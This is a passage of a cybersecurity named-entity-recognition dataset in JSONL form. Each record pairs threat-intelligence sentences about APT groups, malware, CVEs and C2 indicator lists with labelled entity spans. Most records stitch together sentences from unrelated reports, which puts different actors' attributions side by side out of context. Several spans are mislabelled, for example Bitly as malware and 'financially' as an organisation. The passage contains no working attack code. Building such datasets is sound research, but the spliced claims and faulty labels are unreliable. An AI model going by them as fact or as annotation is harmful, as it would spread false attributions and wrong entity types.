shown a surprising level of amateur actions , including code overlaps , open-source project copy/paste , classes never being instanced , unstable packages and unsecured panels . All of them lie in ranges of the Jilin Province Network and Liaoning Province Network , in China . This campaign is notable for targeting East Asian governments , electronics manufacturers , and a telecommunications company . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {}, "info": {"id": "cyberner_stix_valid_000821", "source": "cyberner_stix_valid"}} {"text": "Figure 10 . CTU researchers have observed multiple COBALT GYPSY campaigns since 2015 and consider it highly likely that the group is associated with Iranian government-directed cyber operations . Upon execution , the malware will first decrypt a string from its resources and compare it against the name of the parent process . During the course of researching the Winnti group , we came across previously unreported malware samples that we attributed to the group based on the malware arsenal and the use of registered domains as attack infrastructure .", "spans": {"Organization: CTU": [[12, 15]], "Malware: previously unreported malware samples": [[395, 432]], "Malware: malware arsenal": [[478, 493]], "System: registered domains": [[509, 527]]}, "info": {"id": "cyberner_stix_valid_000822", "source": "cyberner_stix_valid"}} {"text": "SimBad : A Rogue Adware Campaign On Google Play March 13 , 2019 Check Point researchers from the Mobile Threat Team have discovered a new adware campaign on the Google Play Store . As previously mentioned , we assess with high confidence that APT38 's mission is focused on targeting financial institutions and financial systems to raise money for the North Korean regime . 
While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions .", "spans": {"Malware: SimBad": [[0, 6]], "System: Google Play": [[36, 47]], "Organization: Check Point": [[64, 75]], "System: Google Play Store": [[161, 178]], "Organization: financial institutions": [[284, 306]], "Indicator: Backdoor.Nidiran": [[483, 499]]}, "info": {"id": "cyberner_stix_valid_000823", "source": "cyberner_stix_valid"}} {"text": "We believe the initial versions of this malware were created at least three years ago – at the end of 2014 . Most recently MuddyWater were connected to a campaign in March that targeted organizations in Turkey , Pakistan , and Tajikistan . The group 's TTPs overlap extensively with another group , Magic Hound , resulting in reporting that may not distinguish between the two groups' activities .", "spans": {}, "info": {"id": "cyberner_stix_valid_000824", "source": "cyberner_stix_valid"}} {"text": "Red Alert 2.0 IoCs list C2 addresses 103.239.30.126:7878 146.185.241.29:7878 146.185.241.42:7878 185.126.200.3:7878 185.126.200.12:7878 185.126.200.15:7878 185.126.200.18:7878 185.165.28.15:7878 185.243.243.241:7878 185.243.243.244:7878 185.243.243.245:7878 Domains Malware source Web hosts Since at least the beginning of 2014 , APT38 operations have focused almost exclusively on developing and conducting financially motivated campaigns targeting international entities , whereas TEMP.Hermit is generally linked to operations focused on South Korea and the United States . 
Microcode Explorer and so on ) The most recent attack on communications company Viasat in Ukraine had a wider impact across the continent , disrupting wind farms and internet users in central Europe .", "spans": {"Malware: Red Alert 2.0": [[0, 13]], "Organization: international entities": [[450, 472]], "Organization: communications company": [[633, 655]], "Organization: Viasat": [[656, 662]]}, "info": {"id": "cyberner_stix_valid_000825", "source": "cyberner_stix_valid"}} {"text": "The use of weaponized legitimate documents is a longstanding operational standard of this group . The first attack started in early July with a ShimRatReporter payload .", "spans": {"Indicator: ShimRatReporter": [[144, 159]]}, "info": {"id": "cyberner_stix_valid_000826", "source": "cyberner_stix_valid"}} {"text": "If the connection to the C2 fails , it will continue to retry until it is successful . Most interestingly , Rapid7 observed the use of the Notepad++ updater gup.exe as a legitimate executable to sideload a malicious DLL (libcurl.dll) in order to deploy a variant of the UPPERCUT backdoor also known as ANEL . APT34 often uses compromised accounts to conduct spear-phishing operations .", "spans": {"Organization: Rapid7": [[108, 114]], "Malware: gup.exe": [[157, 164]], "Malware: ANEL": [[302, 306]], "Malware: compromised accounts": [[326, 346]]}, "info": {"id": "cyberner_stix_valid_000827", "source": "cyberner_stix_valid"}} {"text": "DoublePulsar is then used to inject a secondary payload , which runs in memory only . 
Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 .", "spans": {"Malware: DoublePulsar": [[0, 12]], "Organization: Anomali": [[86, 93]], "Indicator: ITW": [[172, 175]], "Vulnerability: exploit": [[191, 198]], "Vulnerability: CVE-2018-0798": [[203, 216]]}, "info": {"id": "cyberner_stix_valid_000828", "source": "cyberner_stix_valid"}} {"text": "During the app execution , the malware contacts C2 domain for further instructions . APT38 is a financially motivated group linked to North Korean cyber espionage operators , renowned for attempting to steal hundreds of millions of dollars from financial institutions and their brazen use of destructive malware . this can be seen as calculating a value that will always return True . We also reveal what ransomware gangs are now experimenting with to break into your company — including their offers to “ recruit ” employees as insider threats .", "spans": {"Organization: financial institutions": [[245, 267]]}, "info": {"id": "cyberner_stix_valid_000829", "source": "cyberner_stix_valid"}} {"text": "Again , this package source code is publicly available and can be found here . Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform . When the file is opened , it drops HIGHTIDE in the form of an executable file onto the infected system . 
Additional Email Delegate Permissions APT29 has used a compromised global administrator account in Azure AD to backdoor a service principal with ApplicationImpersonation rights to start collecting emails from targeted mailboxes .", "spans": {"Malware: HIGHTIDE": [[374, 382]]}, "info": {"id": "cyberner_stix_valid_000830", "source": "cyberner_stix_valid"}} {"text": "It ’ s also possible that the apps are being used to test other possible techniques . Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group . in all cases explained here , This plan should outline specific actions and procedures for attack mitigation and remediation , including guidelines for addressing extortion demands .", "spans": {"Organization: 360": [[208, 211]], "Organization: Tuisec": [[216, 222]], "Organization: Unit 42": [[300, 307]]}, "info": {"id": "cyberner_stix_valid_000831", "source": "cyberner_stix_valid"}} {"text": "Unlike previously discovered non Google Play centric campaigns whose victims almost exclusively come from less developed countries and regions , “ Agent Smith ” successfully penetrated into noticeable number of devices in developed countries such as Saudi Arabia , UK and US . Overall , the Bookworm infrastructure overlaps with the infrastructure hosting C2 servers used by various attack tools , including FFRAT , Poison Ivy , PlugX , and others . Our close monitoring of Dexphot helped us ensure that our customers were protected from the evolving threat . 
Hybrid Identity APT29 has edited the Microsoft.IdentityServer.Servicehost.exe.config file to load a malicious DLL into the AD FS process , thereby enabling persistent access to any service federated with AD FS for a user with a specified User Principal Name .", "spans": {"System: Google Play": [[33, 44]], "Malware: Agent Smith": [[147, 158]], "Malware: Dexphot": [[474, 481]]}, "info": {"id": "cyberner_stix_valid_000832", "source": "cyberner_stix_valid"}} {"text": "According to our telemetry , that was the year the distribution campaign was at its most active . This backdoor has some features similar to a previously discovered version of the Muddywater backdoor . Cobalt Group : Cobalt Gang , Cobalt Spider .", "spans": {}, "info": {"id": "cyberner_stix_valid_000833", "source": "cyberner_stix_valid"}} {"text": "In these attacks , the delivery documents used to install Zebrocy used remote templates , which increases the difficulty to analyze the attack as an active C2 server is needed to obtain the macro-enabled document .", "spans": {"Malware: Zebrocy": [[58, 65]]}, "info": {"id": "cyberner_stix_valid_000834", "source": "cyberner_stix_valid"}} {"text": "email as a C2 channel is not a new tactic , but it is generally not observed in the wild as often as HTTP or HTTPS .", "spans": {}, "info": {"id": "cyberner_stix_valid_000835", "source": "cyberner_stix_valid"}} {"text": "The code is obfuscated but not packed . Black Lambert was seen only briefly and we assume it was \" retired \" from the arsenal after being discovered by FireEye in 2014 . The attackers referred to as APT12 ( also known as IXESHE , DynCalc , and DNSCALC ) recently started a new campaign targeting organizations in Japan and Taiwan . 
Adversaries may communicate using a protocol and port pairing that are typically not associated .", "spans": {"Organization: FireEye": [[152, 159]]}, "info": {"id": "cyberner_stix_valid_000836", "source": "cyberner_stix_valid"}} {"text": ", including : searching for , listing , deleting , and renaming files as well as downloading a file into and retrieving a file from the device ; taking screenshots ; installing other application packages ( APK ) ; recording audio and video ; and updating the malware . It is also possible that ScarCruft deployed another zero day exploit , CVE-2016-0147 , which was patched in April . One of the domains used by the attackers in their 2018 campaign of spear phishing contained more than 130 email aliases , leading us to think that more than 130 companies had been targeted by the end of 2018 . In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": {"Vulnerability: zero day exploit": [[321, 337]], "Vulnerability: CVE-2016-0147": [[340, 353]]}, "info": {"id": "cyberner_stix_valid_000837", "source": "cyberner_stix_valid"}} {"text": "The document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC .", "spans": {"Malware: document files": [[4, 18]], "Vulnerability: vulnerabilities": [[48, 63]], "Vulnerability: exploit": [[276, 283]]}, "info": {"id": "cyberner_stix_valid_000838", "source": "cyberner_stix_valid"}} {"text": "This adds an extra layer against detection . 
They have largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well as some non-public backdoors . As mentioned above, one of the parameters passed to the AdrGen function is the action . The attacks used a multistage infection chain initiated with malicious Microsoft Office documents , most commonly using Microsoft Excel and PowerPoint file formats .", "spans": {"Organization: financial , economic and trade policy": [[98, 135]]}, "info": {"id": "cyberner_stix_valid_000839", "source": "cyberner_stix_valid"}} {"text": "At the same time , multinational organizations like the financial services firms targeted here must be acutely aware of the threats from state-sponsored actors working with sophisticated malware to compromise users and networks .", "spans": {}, "info": {"id": "cyberner_stix_valid_000840", "source": "cyberner_stix_valid"}} {"text": "By 2011 , the Dukes had already developed at least 3 distinct malware toolsets , including a plethora of supporting components such as loaders and persistence modules .", "spans": {}, "info": {"id": "cyberner_stix_valid_000841", "source": "cyberner_stix_valid"}} {"text": "Keep Google Play Protect on . In this case , the file used the software name \" Cyberlink \" , and a description of \" CLMediaLibrary Dynamic Link Library \" and listing version 4.19.9.98 . Organizations located in Myanmar and targeted by Spring Dragon have gone unmentioned .", "spans": {"System: Google Play Protect": [[5, 24]], "Malware: Cyberlink": [[79, 88]]}, "info": {"id": "cyberner_stix_valid_000842", "source": "cyberner_stix_valid"}} {"text": "We found no other information stolen from the victims to be accessible . Also , some code pieces are directly re-used in the analyzed campaigns , such as the i.cmd and exit.exe files , and , at the same time , some new components have been introduced , for instance the rtegre.exe” and the veter1605_MAPS_10cr0.exe file . 
The malware is a fully functional RAT with multiple commands that the actors can issue from a command and control ( C2 ) server to a victim 's system via dual proxies .", "spans": {"Malware: i.cmd": [[158, 163]], "Malware: exit.exe": [[168, 176]], "Malware: rtegre.exe”": [[270, 281]], "Malware: veter1605_MAPS_10cr0.exe": [[290, 314]], "Malware: RAT": [[356, 359]]}, "info": {"id": "cyberner_stix_valid_000843", "source": "cyberner_stix_valid"}} {"text": "READ_EXTERNAL_STORAGE - Allows the application to read from external storage . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . One interesting note about the criminal activity of Gorgon Group is their usage of Bitly .", "spans": {"Organization: financial": [[156, 165]], "Malware: Bitly": [[281, 286]]}, "info": {"id": "cyberner_stix_valid_000844", "source": "cyberner_stix_valid"}} {"text": "The timeframe maps to the second half of the workday in China .", "spans": {}, "info": {"id": "cyberner_stix_valid_000845", "source": "cyberner_stix_valid"}} {"text": "In a previous campaign reported by JPCERT , mobile users were alerted by phishy messages containing “ delivery updates ” purportedly from Sagawa Express . Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity . It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware .", "spans": {"Organization: JPCERT": [[35, 41]], "Organization: Sagawa Express": [[138, 152]], "Organization: financial institutions": [[394, 416]], "Malware: Metel": [[474, 479]], "Malware: malware": [[480, 487]]}, "info": {"id": "cyberner_stix_valid_000846", "source": "cyberner_stix_valid"}} {"text": "Continued mirroring suggests it is likely a regularly cleaned staging server . 
A researcher has attributed a recently publicized attack on Citrix' internal network to the Iranian-linked group known as IRIDIUM – and said that the data heist involved 6 terabytes of sensitive data . aoldaily.com aunewsonline.com canadatvsite.com canoedaily.com cnndaily.com cnndaily.net cnnnewsdaily.com defenceonline.net freshreaders.net giftnews.org reutersnewsonline.com rssadvanced.org saltlakenews.org sportreadok.net todayusa.org usapappers.com usnewssite.com yahoodaily.com . Our gathered field data shows the following statistics on CSP usage across the Internet ( based on HTTPArchive March 2020 scan ):", "spans": {"Organization: Citrix'": [[139, 146]], "Indicator: aoldaily.com": [[281, 293]], "Indicator: aunewsonline.com": [[294, 310]], "Indicator: canadatvsite.com": [[311, 327]], "Indicator: canoedaily.com": [[328, 342]], "Indicator: cnndaily.com": [[343, 355]], "Indicator: cnndaily.net": [[356, 368]], "Indicator: cnnnewsdaily.com": [[369, 385]], "Indicator: defenceonline.net": [[386, 403]], "Indicator: freshreaders.net": [[404, 420]], "Indicator: giftnews.org": [[421, 433]], "Indicator: reutersnewsonline.com": [[434, 455]], "Indicator: rssadvanced.org": [[456, 471]], "Indicator: saltlakenews.org": [[472, 488]], "Indicator: sportreadok.net": [[489, 504]], "Indicator: todayusa.org": [[505, 517]], "Indicator: usapappers.com": [[518, 532]], "Indicator: usnewssite.com": [[533, 547]], "Indicator: yahoodaily.com": [[548, 562]], "System: CSP": [[623, 626]], "System: Internet": [[644, 652]], "System: HTTPArchive": [[664, 675]]}, "info": {"id": "cyberner_stix_valid_000847", "source": "cyberner_stix_valid"}} {"text": "With Cybereason Mobile , analysts can address mobile threats in the same platform as traditional endpoint threats , all as part of one incident . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME . 
APT10 is known to have exfiltrated a high volume of data from multiple victims , exploiting compromised MSP networks , and those of their customers , to stealthily move this data around the world .", "spans": {"System: Cybereason Mobile": [[5, 22]], "Malware: st07383.en17.docx": [[158, 175]], "Vulnerability: CVE-2017-0001": [[226, 239]], "Malware: SHIRIME": [[345, 352]], "Malware: MSP networks": [[459, 471]], "Organization: customers": [[493, 502]]}, "info": {"id": "cyberner_stix_valid_000848", "source": "cyberner_stix_valid"}} {"text": "PINCHDUKE : First known activity November 2008 , Most recent known activity Summer 2010 , C&C communication methods HTTP(S) , Known toolset components Multiple loaders , Information stealer .", "spans": {"Malware: PINCHDUKE": [[0, 9]]}, "info": {"id": "cyberner_stix_valid_000849", "source": "cyberner_stix_valid"}} {"text": "In one of their more intriguing cases , the Dukes have appeared to also target entities involved in the trafficking of illegal drugs .", "spans": {}, "info": {"id": "cyberner_stix_valid_000850", "source": "cyberner_stix_valid"}} {"text": "The Event Action Trigger module triggers malicious actions based on certain events . The Charming Kitten' focus appears to be individuals of interest to Iran in the fields of academic research . However the values are dependent on opaque predicates results . 
Mandiant observed UNC4899 utilize various VPN providers as a final hop , the most common being ExpressVPN , but connections to NordVPN , TorGuard and many other providers have also been observed .", "spans": {"Organization: academic research": [[175, 192]], "Organization: Mandiant": [[259, 267]], "System: VPN providers": [[301, 314]], "System: ExpressVPN": [[354, 364]], "System: NordVPN": [[386, 393]], "System: TorGuard": [[396, 404]]}, "info": {"id": "cyberner_stix_valid_000851", "source": "cyberner_stix_valid"}} {"text": "CNIIHM ’s characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": {"Organization: CNIIHM": [[0, 6]]}, "info": {"id": "cyberner_stix_valid_000852", "source": "cyberner_stix_valid"}} {"text": "The cyber industry of mobile malware is becoming more focused on making profits more effectively , i.e. , mobile phishing , theft of credit card information , money transfers from bank cards to mobile phones and from phones to the criminals ’ e-wallets . The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016 , for instance . Once ShadowPad is injected into wmplayer.exe , the Online module will contact the C&C server using the URL specified in the configuration . A risk-averse actor , Iran generally seeks to avoid direct military confrontation against conventionally superior foes .", "spans": {"Malware: ShadowPad": [[418, 427]], "Indicator: wmplayer.exe": [[445, 457]]}, "info": {"id": "cyberner_stix_valid_000853", "source": "cyberner_stix_valid"}} {"text": "The goal of this code is to get information from the properties of the document ( \"Subject\" , \"Company\" , \"Category\" , \"Hyperlink base\" and finally \"Comments\" ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000854", "source": "cyberner_stix_valid"}} {"text": "All Lookout customers are protected from this threat . 
In April , shortly after the Trojan 's discovery , researchers observed a massive GozNym campaign targeting 24 North American banks . The BISCUIT backdoor ( so named for the command “ bdkzt ” ) is an illustrative example of the range of commands that APT1 has built into its “ standard ” backdoors . Kaspersky has more here .", "spans": {"Organization: Lookout": [[4, 11]], "Organization: banks": [[181, 186]], "Malware: BISCUIT backdoor": [[193, 209]], "Malware: bdkzt": [[239, 244]], "Organization: Kaspersky": [[355, 364]]}, "info": {"id": "cyberner_stix_valid_000855", "source": "cyberner_stix_valid"}} {"text": "] net linkdatax [ . For example , the group has repeatedly targeted call record information at telecom companies . In the investigations Mandiant has conducted , it appeared that APT29 deployed POSHSPY as a secondary backdoor for use if they lost access to their primary backdoors .", "spans": {"Organization: telecom": [[95, 102]], "Organization: companies": [[103, 112]], "Organization: Mandiant": [[137, 145]], "Malware: POSHSPY": [[194, 201]]}, "info": {"id": "cyberner_stix_valid_000856", "source": "cyberner_stix_valid"}} {"text": "FireEye believes that two actors – Turla and an unknown financially motivated actor – were using the first EPS zero-day CVE-2017-0261 , and APT28 was using the second EPS zero-day CVE-2017-0262 along with a new Escalation of Privilege (EOP) zero-day CVE-2017-0263 . 
Cybersecurity researchers have uncovered an espionage campaign that has targeted a national data center of an unnamed Central Asian country in order to conduct watering hole attacks .", "spans": {"Organization: FireEye": [[0, 7]], "Organization: financially": [[56, 67]], "Vulnerability: CVE-2017-0261": [[120, 133]], "Vulnerability: CVE-2017-0262": [[180, 193]], "Vulnerability: CVE-2017-0263": [[250, 263]], "Organization: Cybersecurity": [[266, 279]]}, "info": {"id": "cyberner_stix_valid_000857", "source": "cyberner_stix_valid"}} {"text": "Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . The OSX_DOK malware ( Detected by Trend Micro as OSX_DOK.C ) showcases sophisticated features such as certificate abuse and security software evasion that affects machines using Apple ’s OS X operating system .", "spans": {"Malware: TajMahal": [[37, 45]], "Malware: OSX_DOK": [[136, 143]], "Malware: malware": [[144, 151]], "Organization: Trend Micro": [[166, 177]], "Malware: OSX_DOK.C": [[181, 190]], "System: Apple ’s OS X": [[310, 323]]}, "info": {"id": "cyberner_stix_valid_000858", "source": "cyberner_stix_valid"}} {"text": "After installation , the user needs to run the application . When we looked at the cluster of activity which consisted of what appeared to be espionage-focused attacks in the Middle East , we were somewhat confused as the previous public reporting had attributed these attacks to FIN7 . Our systems were able to record the hash of file tmp.vbs , but the contents of the file are no longer available . 
The code is obfuscated , using an obfuscator script , based on the fact that some comments the actor did n’t strip are also obfuscated when the words written in the comments are not recognized as a part of the VBA syntax .", "spans": {"Indicator: tmp.vbs": [[336, 343]]}, "info": {"id": "cyberner_stix_valid_000859", "source": "cyberner_stix_valid"}} {"text": "'Improvise' is a toolset for configuration , post-processing , payload setup and execution vector selection for survey/exfiltration tools supporting all major operating systems like Windows (Bartender) , MacOS (JukeBox) and Linux (DanceFloor) . The well-crafted and socially engineered malicious documents then become the first stage of a long and mainly fileless infection chain that eventually delivers POWERSTATS , a signature PowerShell backdoor of this threat group .", "spans": {"Malware: 'Improvise'": [[0, 11]], "Indicator: POWERSTATS": [[403, 413]], "Indicator: PowerShell backdoor": [[428, 447]]}, "info": {"id": "cyberner_stix_valid_000860", "source": "cyberner_stix_valid"}} {"text": "Scarlet Mimic has carried out attacks using both spear-phishing and watering holes since at least 2009 with increasingly advanced malware , and has deployed malware to attack multiple operating systems and platforms . 
Targeted sectors of Molerats include governmental and diplomatic institutions , including embassies ; companies from the aerospace and defence Industries ; financial institutions ; journalists ; software developers .", "spans": {"Organization: governmental": [[255, 267]], "Organization: embassies": [[308, 317]], "Organization: aerospace": [[339, 348]], "Organization: defence Industries": [[353, 371]], "Organization: financial institutions": [[374, 396]], "Organization: journalists": [[399, 410]], "Organization: software developers": [[413, 432]]}, "info": {"id": "cyberner_stix_valid_000861", "source": "cyberner_stix_valid"}} {"text": "It is quite unusual to find an actual organization behind mobile malware , as most of them are developed by purely malicious actors . ALLANITE operations limit themselves to information gathering and have not demonstrated any disruptive or damaging capabilities . It will then retry the connection with the next remote host , if there is one . Sandworm ’s Threat Activity Reveals Insights into Russia ’s Offensive Cyber Capabilities", "spans": {}, "info": {"id": "cyberner_stix_valid_000862", "source": "cyberner_stix_valid"}} {"text": "Based on this , we believe the Rancor attackers were targeting political entities . Let’s take a closer look at ITG08’s TTPs that are relevant to the campaign we investigated , starting with its spear phishing and intrusion tactics and covering information on its use of the More_eggs backdoor .", "spans": {"Organization: political entities": [[63, 81]], "Indicator: More_eggs backdoor": [[275, 293]]}, "info": {"id": "cyberner_stix_valid_000863", "source": "cyberner_stix_valid"}} {"text": "The configuration file contains a list of financial applications that can be targeted by EventBot . 
While Symantec has never observed the use of Filensfer alongside any known Buckeye tools , information shared privately by another vendor included evidence of Filensfer being used in conjunction with known Buckeye malware (Backdoor.Pirpi) . To set up persistence , the loader writes a file to \" c:\\temp\\rr.exe \" and executes it with specific command line arguments to create auto run registry keys .", "spans": {"Malware: EventBot": [[89, 97]], "Organization: Symantec": [[106, 114]], "Malware: Filensfer": [[145, 154]], "Malware: Buckeye malware": [[306, 321]], "Indicator: c:\\temp\\rr.exe": [[395, 409]]}, "info": {"id": "cyberner_stix_valid_000864", "source": "cyberner_stix_valid"}} {"text": "Additionally , early variants of KASPERAGENT used “ Chrome ”", "spans": {"Malware: KASPERAGENT": [[33, 44]]}, "info": {"id": "cyberner_stix_valid_000865", "source": "cyberner_stix_valid"}} {"text": "Secure logs in a centralized location and protect them from modification .", "spans": {}, "info": {"id": "cyberner_stix_valid_000866", "source": "cyberner_stix_valid"}} {"text": "Riltok mobile Trojan : A banker with global reach 25 JUN 2019 Riltok is one of numerous families of mobile banking Trojans with standard ( for such malware ) functions and distribution methods . Symantec did not observe the initial access point and the close timeframe between Waterbug observed activity on the victim’s network and its observed use of Crambus infrastructure suggests that Waterbug may have used the Crambus infrastructure as an initial access point . 
The current version of the malware allows the operator to steal files , keystrokes , perform screenshots , and execute arbitrary code on the infected host .", "spans": {"Malware: Riltok": [[0, 6], [62, 68]], "Organization: Symantec": [[195, 203]], "Organization: Crambus infrastructure": [[416, 438]]}, "info": {"id": "cyberner_stix_valid_000867", "source": "cyberner_stix_valid"}} {"text": "To date , Sowbug appears to be focused mainly on government entities in South America and Southeast Asia and has infiltrated organizations in Argentina , Brazil , Ecuador , Peru , Brunei and Malaysia . While the machine is in isolation , SOC personnel can direct the infected machine to collect live investigation data , such as the DNS cache or security event logs , which they can use to verify alerts , assess the state of the intrusion , and support follow-up actions .", "spans": {"Organization: government entities": [[49, 68]], "Organization: infiltrated organizations": [[113, 138]], "Organization: SOC personnel": [[238, 251]]}, "info": {"id": "cyberner_stix_valid_000868", "source": "cyberner_stix_valid"}} {"text": "The chat application acts as a dropper for this second-stage payload app . Since the Bangladesh incident there have been just a few articles explaining the connection between Lazarus Group and the Bangladesh bank heist . Elfin : Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S . 
KillNet ’s targeting has consistently aligned with established and emerging Russian geopolitical priorities , which suggests that at least part of the influence component of this hacktivist activity is intended to directly promote Russia 's interests within perceived adversary nations vis - a - vis the invasion of Ukraine .", "spans": {"Organization: bank": [[208, 212]], "Organization: Ukraine": [[629, 636]]}, "info": {"id": "cyberner_stix_valid_000869", "source": "cyberner_stix_valid"}} {"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": {"Vulnerability: CVE-2017-11882": [[37, 51]], "Vulnerability: (CVE-2017-11882)": [[146, 162]], "Vulnerability: CVE-2012-0158": [[225, 238]]}, "info": {"id": "cyberner_stix_valid_000870", "source": "cyberner_stix_valid"}} {"text": "It also drops decoy documents in an attempt to camouflage the attack .", "spans": {}, "info": {"id": "cyberner_stix_valid_000871", "source": "cyberner_stix_valid"}} {"text": "However , we can reassemble the whole infection procedure based on our telemetry .", "spans": {}, "info": {"id": "cyberner_stix_valid_000872", "source": "cyberner_stix_valid"}} {"text": "Upon clicking the ads , the malware author receives payment from the website developer , which pays for the illegitimate clicks and traffic . ALLANITE activity closely resembles Palmetto Fusion described by the US Department of Homeland Security . with the server . 
This is analogous to antivirus solutions using known virus signatures to determine if a computing interaction suggests virus installation or malware delivery across the network .", "spans": {"Organization: Department of Homeland Security": [[214, 245]]}, "info": {"id": "cyberner_stix_valid_000873", "source": "cyberner_stix_valid"}} {"text": "TG-1314 was mapping network drives using a compromised Altiris account to connect to additional systems .", "spans": {}, "info": {"id": "cyberner_stix_valid_000874", "source": "cyberner_stix_valid"}} {"text": "XLoader can also hijack the infected device ( i.e. , send SMSs ) and sports self-protection/persistence mechanisms through device administrator privileges . Arbor also published APT research on this group , and named it ‘Donot’ . After that , it executes “ exit.exe ” which launches the “ i.cmd ” batch script .", "spans": {"Malware: XLoader": [[0, 7]], "Organization: Arbor": [[157, 162]], "Indicator: exit.exe": [[257, 265]], "Indicator: i.cmd": [[289, 294]]}, "info": {"id": "cyberner_stix_valid_000875", "source": "cyberner_stix_valid"}} {"text": "It constructs this list using the WMI query : “SELECT displayName FROM AntivirusProduct ” .", "spans": {"System: WMI": [[34, 37]]}, "info": {"id": "cyberner_stix_valid_000876", "source": "cyberner_stix_valid"}} {"text": "Hotfixmsupload.com is particularly interesting as it has been identified as a Sofacy C2 domain repeatedly , and was also brought forth by Microsoft in a legal complaint against STRONTIUM ( Sofacy ) as documented here .", "spans": {"Indicator: Hotfixmsupload.com": [[0, 18]], "Organization: Microsoft": [[138, 147]]}, "info": {"id": "cyberner_stix_valid_000877", "source": "cyberner_stix_valid"}} {"text": "CapabilitiesFormBook is a data stealer , but not a full-fledged banker . 
Although Silence 's phishing emails were also sent to bank employees in Central and Western Europe , Africa , and Asia ) .", "spans": {"Organization: CapabilitiesFormBook": [[0, 20]], "Organization: banker": [[64, 70]], "Organization: bank employees": [[127, 141]]}, "info": {"id": "cyberner_stix_valid_000878", "source": "cyberner_stix_valid"}} {"text": "Network : Presence of http and DNS traffic to the network IOCs shared above .", "spans": {}, "info": {"id": "cyberner_stix_valid_000879", "source": "cyberner_stix_valid"}} {"text": "We observed all these characteristics in the Bisonal 's attacks against both Russia and South Korea . These attacks have included criminal groups responsible for the delivery of NewPosThings , MalumPOS and PoSeidon point of sale Malware , as well as Carbanak from the Russian criminal organization we track as Carbon Spider .", "spans": {"Malware: Carbanak": [[250, 258]]}, "info": {"id": "cyberner_stix_valid_000880", "source": "cyberner_stix_valid"}} {"text": "] somtum [ . The operation against the Tibetan Parliamentarians illustrates the continued use of malicious attachments in the form of documents bearing exploits . But we do know the change was sudden . 
Beginning in January 2021 , Mandiant Managed Defense observed multiple instances of abuse of Microsoft Exchange Server within at least one client environment .", "spans": {"Organization: Tibetan Parliamentarians": [[39, 63]], "Malware: malicious attachments": [[97, 118]], "Organization: Mandiant Managed Defense": [[230, 254]], "System: Microsoft Exchange Server": [[295, 320]]}, "info": {"id": "cyberner_stix_valid_000881", "source": "cyberner_stix_valid"}} {"text": "Jane ’s by IHSMarkit is a well-known supplier of information and analysis often times associated with the defense and government sector .", "spans": {"Organization: IHSMarkit": [[11, 20]]}, "info": {"id": "cyberner_stix_valid_000882", "source": "cyberner_stix_valid"}} {"text": "As part of the disclosure , Ormandy also included the source code for a proof-of-concept exploit for the vulnerability .", "spans": {}, "info": {"id": "cyberner_stix_valid_000883", "source": "cyberner_stix_valid"}} {"text": "Below is a collection of API methods and a brief description around their purpose . We uncovered the activity of a hacking group which has Chinese origins . At this point , the ZxShell library is no longer linked in the module list of the host process . In other highly successful runs , the actor sent out phony Flash videos directly as email attachments .", "spans": {"Malware: ZxShell": [[177, 184]]}, "info": {"id": "cyberner_stix_valid_000884", "source": "cyberner_stix_valid"}} {"text": "Hence , we name this new spin-off campaign as Jaguar Kill Switch . The documents that exploit CVE2017-11882 download another payload — an HTML Application ( HTA ) file toting a malicious Visual Basic ( VBS ) script — from the server , which is executed accordingly by the command-line tool mshta.exe . The main attack vector is via email with crafted Word , Excel or PDF documents attached . 
If you ’re a user in Ukraine or Poland , especially someone working in the government or military sectors , this is a clear - cut example of a spam campaign targeting this population .", "spans": {"Vulnerability: CVE2017-11882": [[94, 107]], "Malware: HTA": [[157, 160]], "Malware: mshta.exe": [[290, 299]], "Organization: the government": [[463, 477]], "Organization: military sectors": [[481, 497]]}, "info": {"id": "cyberner_stix_valid_000885", "source": "cyberner_stix_valid"}} {"text": "These attacks show significant similarities to previously documented attacks attributed to the Arabic-speaking threat actor , commonly referred to as the MoleRATs group ( aka , The Gaza Cybergang , Moonlight , DustySky , Gaza Hacker Team ) .", "spans": {}, "info": {"id": "cyberner_stix_valid_000886", "source": "cyberner_stix_valid"}} {"text": "The usefulness of flare-qdb can be seen in cases such as loops dealing with strings . Hackers use the exploits \" Nitris Exploit Kit \" ( earlier known as CottonCastle ) , which is not available in open sources and sold only to trusted users .", "spans": {"Malware: flare-qdb": [[18, 27]], "Vulnerability: Nitris Exploit Kit": [[113, 131]], "Vulnerability: CottonCastle": [[153, 165]]}, "info": {"id": "cyberner_stix_valid_000887", "source": "cyberner_stix_valid"}} {"text": "Below is a description of the most noteworthy : The implant is able to spy on all available device sensors and to log registered events . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and 